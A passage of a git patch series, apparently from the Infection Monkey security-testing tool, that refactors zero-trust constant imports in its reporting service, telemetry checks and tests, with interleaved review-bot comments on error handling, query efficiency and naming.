STATUS_PASSED: 2, - STATUS_UNEXECUTED: 1, + zero_trust_consts.STATUS_FAILED: 1, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 2, + zero_trust_consts.STATUS_UNEXECUTED: 1, "pillar": "Devices" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 0, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 0, "pillar": "Workloads" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 3, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 3, "pillar": "Visibility & Analytics" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 0, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 0, "pillar": "Automation & Orchestration" } ] 
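Review bot: The expected entries in this hunk pair constant keys with literal pillar names (`"pillar": "Data"`, `"pillar": "People"`, …) while the sibling `@@ -279,13 +291,13 @@` hunk of the same file keys the same pillars through `zero_trust_consts.DATA`, `zero_trust_consts.PEOPLE` and so on. If those constants evaluate to the display strings used here, `"pillar": zero_trust_consts.DATA` would keep this test in step with a renamed pillar instead of failing on a string mismatch; if they do not, a comment such as `# "pillar" is intentionally the user-facing label, not the constant` would stop the next reader from "fixing" it. The enclosing test method begins before this hunk.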
@@ -279,13 +291,13 @@ class TestZeroTrustService(IslandTestCase): self.maxDiff = None expected = { - AUTOMATION_ORCHESTRATION: STATUS_UNEXECUTED, - DEVICES: STATUS_UNEXECUTED, - NETWORKS: STATUS_UNEXECUTED, - PEOPLE: STATUS_UNEXECUTED, - VISIBILITY_ANALYTICS: STATUS_UNEXECUTED, - WORKLOADS: STATUS_UNEXECUTED, - DATA: STATUS_UNEXECUTED + zero_trust_consts.AUTOMATION_ORCHESTRATION: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DEVICES: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.NETWORKS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.PEOPLE: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.VISIBILITY_ANALYTICS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.WORKLOADS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DATA: zero_trust_consts.STATUS_UNEXECUTED } self.assertEqual(ZeroTrustService.get_pillars_to_statuses(), expected) @@ -293,13 +305,13 @@ class TestZeroTrustService(IslandTestCase): save_example_findings() expected = { - AUTOMATION_ORCHESTRATION: STATUS_UNEXECUTED, - DEVICES: STATUS_FAILED, - NETWORKS: STATUS_VERIFY, - PEOPLE: STATUS_VERIFY, - VISIBILITY_ANALYTICS: STATUS_UNEXECUTED, - WORKLOADS: STATUS_UNEXECUTED, - DATA: STATUS_FAILED + zero_trust_consts.AUTOMATION_ORCHESTRATION: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DEVICES: zero_trust_consts.STATUS_FAILED, + zero_trust_consts.NETWORKS: zero_trust_consts.STATUS_VERIFY, + zero_trust_consts.PEOPLE: zero_trust_consts.STATUS_VERIFY, + zero_trust_consts.VISIBILITY_ANALYTICS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.WORKLOADS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DATA: zero_trust_consts.STATUS_FAILED } self.assertEqual(ZeroTrustService.get_pillars_to_statuses(), expected) diff --git a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py index 24bd81e0d..9937c0b6d 100644 
--- a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py @@ -1,8 +1,7 @@ import json -from common.data.zero_trust_consts import PILLARS, STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED, \ - PILLARS_TO_TESTS, TESTS_MAP, PILLARS_KEY, PRINCIPLES_TO_TESTS, PRINCIPLES_TO_PILLARS, PRINCIPLES, ORDERED_TEST_STATUSES, \ - TEST_EXPLANATION_KEY, FINDING_EXPLANATION_BY_STATUS_KEY +import common.data.zero_trust_consts as zero_trust_consts + from monkey_island.cc.models.zero_trust.finding import Finding @@ -10,7 +9,7 @@ class ZeroTrustService(object): @staticmethod def get_pillars_grades(): pillars_grades = [] - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: pillars_grades.append(ZeroTrustService.__get_pillar_grade(pillar)) return pillars_grades @@ -19,13 +18,13 @@ class ZeroTrustService(object): all_findings = Finding.objects() pillar_grade = { "pillar": pillar, - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 0 + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 0 } - tests_of_this_pillar = PILLARS_TO_TESTS[pillar] + tests_of_this_pillar = zero_trust_consts.PILLARS_TO_TESTS[pillar] test_unexecuted = {} for test in tests_of_this_pillar: @@ -33,11 +32,11 @@ class ZeroTrustService(object): for finding in all_findings: test_unexecuted[finding.test] = False - test_info = TESTS_MAP[finding.test] - if pillar in test_info[PILLARS_KEY]: + test_info = zero_trust_consts.TESTS_MAP[finding.test] + if pillar in test_info[zero_trust_consts.PILLARS_KEY]: pillar_grade[finding.status] += 1 - pillar_grade[STATUS_UNEXECUTED] = sum(1 for condition in list(test_unexecuted.values()) if condition) + pillar_grade[zero_trust_consts.STATUS_UNEXECUTED] = sum(1 for condition in list(test_unexecuted.values()) if condition) return pillar_grade 
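Review bot: `pillar_grade[finding.status] += 1` in the `@@ -33,11 +32,11 @@` hunk raises KeyError for any finding whose status is not one of the four keys initialised in the `@@ -19,13 +18,13 @@` hunk, which aborts the whole pillar-grade report rather than skipping one finding; the same assumption appears as `ORDERED_TEST_STATUSES.index(...)` (ValueError) in the `__get_principle_status` and `__get_lcd_worst_status_for_test` hunks further down. Whether a stored finding can carry any other status value is not visible in the diff, so at minimum state the contract: `# assumes finding.status is one of the four STATUS_* keys; any other value raises KeyError`. Independently, `list(test_unexecuted.values())` materialises the values only to iterate them once — `sum(1 for condition in test_unexecuted.values() if condition)` is equivalent. `__get_pillar_grade` begins before the `@@ -19,13 +18,13 @@` hunk.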
@@ -46,14 +45,14 @@ class ZeroTrustService(object): all_principles_statuses = {} # init with empty lists - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: all_principles_statuses[pillar] = [] - for principle, principle_tests in list(PRINCIPLES_TO_TESTS.items()): - for pillar in PRINCIPLES_TO_PILLARS[principle]: + for principle, principle_tests in list(zero_trust_consts.PRINCIPLES_TO_TESTS.items()): + for pillar in zero_trust_consts.PRINCIPLES_TO_PILLARS[principle]: all_principles_statuses[pillar].append( { - "principle": PRINCIPLES[principle], + "principle": zero_trust_consts.PRINCIPLES[principle], "tests": ZeroTrustService.__get_tests_status(principle_tests), "status": ZeroTrustService.__get_principle_status(principle_tests) } @@ -63,13 +62,13 @@ class ZeroTrustService(object): @staticmethod def __get_principle_status(principle_tests): - worst_status = STATUS_UNEXECUTED + worst_status = zero_trust_consts.STATUS_UNEXECUTED all_statuses = set() for test in principle_tests: all_statuses |= set(Finding.objects(test=test).distinct("status")) for status in all_statuses: - if ORDERED_TEST_STATUSES.index(status) < ORDERED_TEST_STATUSES.index(worst_status): + if zero_trust_consts.ORDERED_TEST_STATUSES.index(status) < zero_trust_consts.ORDERED_TEST_STATUSES.index(worst_status): worst_status = status return worst_status @@ -81,7 +80,7 @@ class ZeroTrustService(object): test_findings = Finding.objects(test=test) results.append( { - "test": TESTS_MAP[test][TEST_EXPLANATION_KEY], + "test": zero_trust_consts.TESTS_MAP[test][zero_trust_consts.TEST_EXPLANATION_KEY], "status": ZeroTrustService.__get_lcd_worst_status_for_test(test_findings) } ) 
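Review bot: The comparison line in the `__get_principle_status` hunk now runs well past 120 columns and calls `ORDERED_TEST_STATUSES.index` twice per iteration; the loop computes the minimum by severity rank and reads as one expression: `return min(all_statuses | {zero_trust_consts.STATUS_UNEXECUTED}, key=zero_trust_consts.ORDERED_TEST_STATUSES.index)`. The same shape fits `__get_lcd_worst_status_for_test` in the `@@ -94,9 +93,9 @@` hunk of this file: `return min({f.status for f in all_findings_for_test} | {zero_trust_consts.STATUS_UNEXECUTED}, key=zero_trust_consts.ORDERED_TEST_STATUSES.index)`. Behaviour is unchanged, because a status only replaces the running worst when its rank is strictly lower, which is exactly the minimum over the union; that second function's `def` line is outside its hunk.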
@@ -94,9 +93,9 @@ class ZeroTrustService(object): :return: the "worst" (i.e. most severe) status out of the given findings. lcd stands for lowest common denominator. """ - current_worst_status = STATUS_UNEXECUTED + current_worst_status = zero_trust_consts.STATUS_UNEXECUTED for finding in all_findings_for_test: - if ORDERED_TEST_STATUSES.index(finding.status) < ORDERED_TEST_STATUSES.index(current_worst_status): + if zero_trust_consts.ORDERED_TEST_STATUSES.index(finding.status) < zero_trust_consts.ORDERED_TEST_STATUSES.index(current_worst_status): current_worst_status = finding.status return current_worst_status @@ -109,11 +108,11 @@ class ZeroTrustService(object): @staticmethod def __get_enriched_finding(finding): - test_info = TESTS_MAP[finding.test] + test_info = zero_trust_consts.TESTS_MAP[finding.test] enriched_finding = { - "test": test_info[FINDING_EXPLANATION_BY_STATUS_KEY][finding.status], + "test": test_info[zero_trust_consts.FINDING_EXPLANATION_BY_STATUS_KEY][finding.status], "test_key": finding.test, - "pillars": test_info[PILLARS_KEY], + "pillars": test_info[zero_trust_consts.PILLARS_KEY], "status": finding.status, "events": ZeroTrustService.__get_events_as_dict(finding.events) } @@ -126,12 +125,12 @@ class ZeroTrustService(object): @staticmethod def get_statuses_to_pillars(): results = { - STATUS_FAILED: [], - STATUS_VERIFY: [], - STATUS_PASSED: [], - STATUS_UNEXECUTED: [] + zero_trust_consts.STATUS_FAILED: [], + zero_trust_consts.STATUS_VERIFY: [], + zero_trust_consts.STATUS_PASSED: [], + zero_trust_consts.STATUS_UNEXECUTED: [] } - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: results[ZeroTrustService.__get_status_of_single_pillar(pillar)].append(pillar) return results @@ -139,7 +138,7 @@ class ZeroTrustService(object): @staticmethod def get_pillars_to_statuses(): results = {} - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: results[pillar] = ZeroTrustService.__get_status_of_single_pillar(pillar) return results 
@@ -147,7 +146,7 @@ class ZeroTrustService(object): @staticmethod def __get_status_of_single_pillar(pillar): grade = ZeroTrustService.__get_pillar_grade(pillar) - for status in ORDERED_TEST_STATUSES: + for status in zero_trust_consts.ORDERED_TEST_STATUSES: if grade[status] > 0: return status - return STATUS_UNEXECUTED + return zero_trust_consts.STATUS_UNEXECUTED diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py index db5b6445d..ddc1af65b 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py @@ -1,7 +1,6 @@ import json -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_LOCAL, \ - STATUS_PASSED, STATUS_FAILED, TEST_ENDPOINT_SECURITY_EXISTS +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event @@ -14,7 +13,7 @@ def test_antivirus_existence(telemetry_json): process_list_event = Event.create_event( title="Process list", message="Monkey on {} scanned the process list".format(current_monkey.hostname), - event_type=EVENT_TYPE_MONKEY_LOCAL) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL) events = [process_list_event] av_processes = filter_av_processes(telemetry_json) 
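Review bot: `__get_status_of_single_pillar` calls `__get_pillar_grade` for every pillar it is asked about, and that helper (see the `@@ -19,13 +18,13 @@` hunk of this file) starts with `all_findings = Finding.objects()`, so `get_pillars_to_statuses` and `get_statuses_to_pillars` each pull the entire findings collection once per pillar. Loading the findings once and handing them down (for example an optional `all_findings=None` parameter on `__get_pillar_grade` that falls back to the query) would make report generation a single query. The fallback `return zero_trust_consts.STATUS_UNEXECUTED` is only reached when every status counter in the grade is zero, which deserves a one-line comment: `# every counter is 0: nothing in this pillar has a finding yet`.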
@@ -24,15 +23,15 @@ def test_antivirus_existence(telemetry_json): title="Found AV process", message="The process '{}' was recognized as an Anti Virus process. Process " "details: {}".format(process[1]['name'], json.dumps(process[1])), - event_type=EVENT_TYPE_MONKEY_LOCAL + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL )) if len(av_processes) > 0: - test_status = STATUS_PASSED + test_status = zero_trust_consts.STATUS_PASSED else: - test_status = STATUS_FAILED + test_status = zero_trust_consts.STATUS_FAILED AggregateFinding.create_or_add_to_existing( - test=TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events + test=zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py index 6c5b1154b..f6af5e4bf 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py @@ -1,5 +1,4 @@ -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_COMMUNICATE_AS_NEW_USER, \ - STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event 
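Review bot: `if len(av_processes) > 0:` in this hunk tests a collection by its length; if `filter_av_processes` (outside the diff) returns a list the idiomatic form is `if av_processes:`, and if it ever returns an iterator the `len()` call raises TypeError. Separately, the "Found AV process" message embeds `json.dumps(process[1])` — process-list data reported by the agent from the scanned host — verbatim into a stored event message; the renderer is not visible here, so a comment on that line would help whoever displays it: `# process details originate from agent telemetry; treat as untrusted text wherever it is rendered`. `test_antivirus_existence` begins before this hunk.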
@@ -10,9 +9,9 @@ COMM_AS_NEW_USER_SUCCEEDED_FORMAT = \ def test_new_user_communication(current_monkey, success, message): AggregateFinding.create_or_add_to_existing( - test=TEST_COMMUNICATE_AS_NEW_USER, + test=zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER, # If the monkey succeeded to create a user, then the test failed. - status=STATUS_FAILED if success else STATUS_PASSED, + status=zero_trust_consts.STATUS_FAILED if success else zero_trust_consts.STATUS_PASSED, events=[ get_attempt_event(current_monkey), get_result_event(current_monkey, message, success) @@ -24,7 +23,7 @@ def get_attempt_event(current_monkey): tried_to_communicate_event = Event.create_event( title="Communicate as new user", message="Monkey on {} tried to create a new user and communicate from it.".format(current_monkey.hostname), - event_type=EVENT_TYPE_MONKEY_NETWORK) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) return tried_to_communicate_event @@ -34,4 +33,4 @@ def get_result_event(current_monkey, message, success): return Event.create_event( title="Communicate as new user", message=message_format.format(current_monkey.hostname, message), - event_type=EVENT_TYPE_MONKEY_NETWORK) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py index e6afcf088..d7b447e4a 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py 
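Review bot: `test_new_user_communication` carries no docstring, and its `success` argument maps to the inverted status (`STATUS_FAILED if success else STATUS_PASSED`) while the inline comment speaks only of creating a user, whereas the attempt event in the `@@ -24,7 +23,7 @@` hunk describes creating a user and communicating from it — so which outcome `success` reports is unclear from the function itself. A one-line docstring along the lines of `"""Record the finding; success=True means the monkey could act as a new user (to be confirmed: create only, or create and communicate), which fails the test."""` would settle it, with the inline comment adjusted to match. The call's closing lines are outside this hunk.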
@@ -1,8 +1,7 @@ import json from common.data.network_consts import ES_SERVICE -from common.data.zero_trust_consts import STATUS_PASSED, EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_DATA_ENDPOINT_HTTP, \ - TEST_DATA_ENDPOINT_ELASTIC +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event @@ -13,8 +12,8 @@ HTTP_SERVERS_SERVICES_NAMES = ['tcp-80'] def test_open_data_endpoints(telemetry_json): services = telemetry_json["data"]["machine"]["services"] current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']) - found_http_server_status = STATUS_PASSED - found_elastic_search_server = STATUS_PASSED + found_http_server_status = zero_trust_consts.STATUS_PASSED + found_elastic_search_server = zero_trust_consts.STATUS_PASSED events = [ Event.create_event( @@ -22,7 +21,7 @@ def test_open_data_endpoints(telemetry_json): message="Monkey on {} tried to perform a network scan, the target was {}.".format( current_monkey.hostname, telemetry_json["data"]["machine"]["ip_addr"]), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=telemetry_json["timestamp"] ) ] @@ -31,10 +30,10 @@ def test_open_data_endpoints(telemetry_json): events.append(Event.create_event( title="Scan telemetry analysis", message="Scanned service: {}.".format(service_name), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK )) if service_name in HTTP_SERVERS_SERVICES_NAMES: - found_http_server_status = STATUS_FAILED + found_http_server_status = zero_trust_consts.STATUS_FAILED events.append(Event.create_event( title="Scan telemetry analysis", message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( 
@@ -42,10 +41,10 @@ def test_open_data_endpoints(telemetry_json): telemetry_json["data"]["machine"]["ip_addr"], json.dumps(service_data) ), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK )) if service_name == ES_SERVICE: - found_elastic_search_server = STATUS_FAILED + found_elastic_search_server = zero_trust_consts.STATUS_FAILED events.append(Event.create_event( title="Scan telemetry analysis", message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( @@ -53,17 +52,17 @@ def test_open_data_endpoints(telemetry_json): telemetry_json["data"]["machine"]["ip_addr"], json.dumps(service_data) ), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK )) AggregateFinding.create_or_add_to_existing( - test=TEST_DATA_ENDPOINT_HTTP, + test=zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, status=found_http_server_status, events=events ) AggregateFinding.create_or_add_to_existing( - test=TEST_DATA_ENDPOINT_ELASTIC, + test=zero_trust_consts.TEST_DATA_ENDPOINT_ELASTIC, status=found_elastic_search_server, events=events ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py index fe0015576..8c128e7f9 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED, STATUS_FAILED, TEST_MACHINE_EXPLOITED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event 
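Review bot: Both `AggregateFinding.create_or_add_to_existing` calls at the end of this hunk pass the same `events` list, so the HTTP finding's evidence includes the Elasticsearch-detection events appended in the `@@ -42,10 +41,10 @@` hunk and the Elasticsearch finding's evidence includes the HTTP ones. If that is not intended, keep the shared scan events in `events` and append each service-specific detection to its own `http_events` / `elastic_events` list that is passed to the matching finding. As a smaller point, `found_elastic_search_server` holds a status value exactly as `found_http_server_status` does; naming it `found_elastic_search_server_status` would make the pair read alike. `test_open_data_endpoints` begins in the `@@ -13,8 +12,8 @@` hunk on the previous line.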
@@ -11,11 +11,11 @@ def test_machine_exploited(current_monkey, exploit_successful, exploiter, target current_monkey.hostname, target_ip, exploiter), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=timestamp ) ] - status = STATUS_PASSED + status = zero_trust_consts.STATUS_PASSED if exploit_successful: events.append( Event.create_event( @@ -24,13 +24,13 @@ def test_machine_exploited(current_monkey, exploit_successful, exploiter, target current_monkey.hostname, target_ip, exploiter), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=timestamp) ) - status = STATUS_FAILED + status = zero_trust_consts.STATUS_FAILED AggregateFinding.create_or_add_to_existing( - test=TEST_MACHINE_EXPLOITED, + test=zero_trust_consts.TEST_MACHINE_EXPLOITED, status=status, events=events ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py index 626a4cc52..f2c3f61b6 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py @@ -1,6 +1,6 @@ import itertools -from common.data.zero_trust_consts import STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from common.network.network_range import NetworkRange from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst, get_ip_if_in_subnet from monkey_island.cc.models import Monkey 
@@ -28,7 +28,7 @@ def test_segmentation_violation(current_monkey, target_ip): event = get_segmentation_violation_event(current_monkey, source_subnet, target_ip, target_subnet) SegmentationFinding.create_or_add_to_existing_finding( subnets=[source_subnet, target_subnet], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) @@ -66,7 +66,7 @@ def get_segmentation_violation_event(current_monkey, source_subnet, target_ip, t target_ip=target_ip, target_seg=target_subnet ), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) @@ -92,7 +92,7 @@ def create_or_add_findings_for_all_pairs(all_subnets, current_monkey): for subnet_pair in all_subnets_pairs_for_this_monkey: SegmentationFinding.create_or_add_to_existing_finding( subnets=list(subnet_pair), - status=STATUS_PASSED, + status=zero_trust_consts.STATUS_PASSED, segmentation_event=get_segmentation_done_event(current_monkey, subnet_pair) ) @@ -104,5 +104,5 @@ def get_segmentation_done_event(current_monkey, subnet_pair): hostname=current_monkey.hostname, src_seg=subnet_pair[0], dst_seg=subnet_pair[1]), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py index 900ac2f89..50d5f1c0b 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py 
@@ -1,7 +1,6 @@ import uuid -from common.data.zero_trust_consts import TEST_SEGMENTATION, STATUS_PASSED, STATUS_FAILED, \ - EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding 
@@ -26,21 +25,29 @@ class TestSegmentationTests(IslandTestCase): ip_addresses=[FIRST_SUBNET]) # no findings - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 0) + self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 0) # This is like the monkey is done and sent done telem create_or_add_findings_for_all_pairs(all_subnets, monkey) # There are 2 subnets in which the monkey is NOT - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_PASSED)), 2) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED)), + 2) # This is a monkey from 2nd subnet communicated with 1st subnet. SegmentationFinding.create_or_add_to_existing_finding( [FIRST_SUBNET, SECOND_SUBNET], - STATUS_FAILED, - Event.create_event(title="sdf", message="asd", event_type=EVENT_TYPE_MONKEY_NETWORK) + zero_trust_consts.STATUS_FAILED, + Event.create_event(title="sdf", message="asd", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) ) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_PASSED)), 1) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_FAILED)), 1) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 2) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED)), + 1) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED)), + 1) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), + 2) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py index ce34c2bb4..e402525c8 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py 
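Review bot: The event created in this hunk uses placeholder text (`title="sdf", message="asd"`), which makes a failing assertion harder to read when the finding is dumped; something like `title="Segmentation test", message="Cross-subnet communication"` costs nothing. The assertions also wrap the queryset in `len(...)`, which fetches every matching document only to count them; this looks like a mongoengine queryset, whose `.count()` would express the intent without the fetch, e.g. `self.assertEqual(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION).count(), 2)`. The test method begins before this hunk.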
@@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import TEST_TUNNELING, STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event @@ -14,13 +14,13 @@ def test_tunneling_violation(tunnel_telemetry_json): title="Tunneling event", message="Monkey on {hostname} tunneled traffic through {proxy}.".format( hostname=current_monkey.hostname, proxy=tunnel_host_ip), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=tunnel_telemetry_json['timestamp'] )] AggregateFinding.create_or_add_to_existing( - test=TEST_TUNNELING, - status=STATUS_FAILED, + test=zero_trust_consts.TEST_TUNNELING, + status=zero_trust_consts.STATUS_FAILED, events=tunneling_events ) From bcf2d964d767a9c383fcf499aaad2cb8e8b940f2 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 4 Nov 2019 11:44:25 +0200 Subject: [PATCH 44/53] Moved representations to services --- monkey/monkey_island/cc/app.py | 8 ++++---- .../cc/{resources => services}/representations.py | 0 .../cc/{resources => services}/representations_test.py | 2 +- 3 files changed, 5 insertions(+), 5 deletions(-) rename monkey/monkey_island/cc/{resources => services}/representations.py (100%) rename monkey/monkey_island/cc/{resources => services}/representations_test.py (95%) diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index 9b5e7b849..be2430dda 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py 
@@ -21,18 +21,18 @@ from monkey_island.cc.resources.netmap import NetMap from monkey_island.cc.resources.node import Node from monkey_island.cc.resources.remote_run import RemoteRun from monkey_island.cc.resources.reporting.report import Report -from monkey_island.cc.resources.representations import output_json from monkey_island.cc.resources.root import Root from monkey_island.cc.resources.telemetry import Telemetry from monkey_island.cc.resources.telemetry_feed import TelemetryFeed from monkey_island.cc.resources.pba_file_download import PBAFileDownload from monkey_island.cc.resources.version_update import VersionUpdate -from monkey_island.cc.services.database import Database -from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH -from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService from monkey_island.cc.resources.pba_file_upload import FileUpload from monkey_island.cc.resources.attack.attack_config import AttackConfiguration from monkey_island.cc.resources.attack.attack_report import AttackReport +from monkey_island.cc.services.database import Database +from monkey_island.cc.services.remote_run_aws import 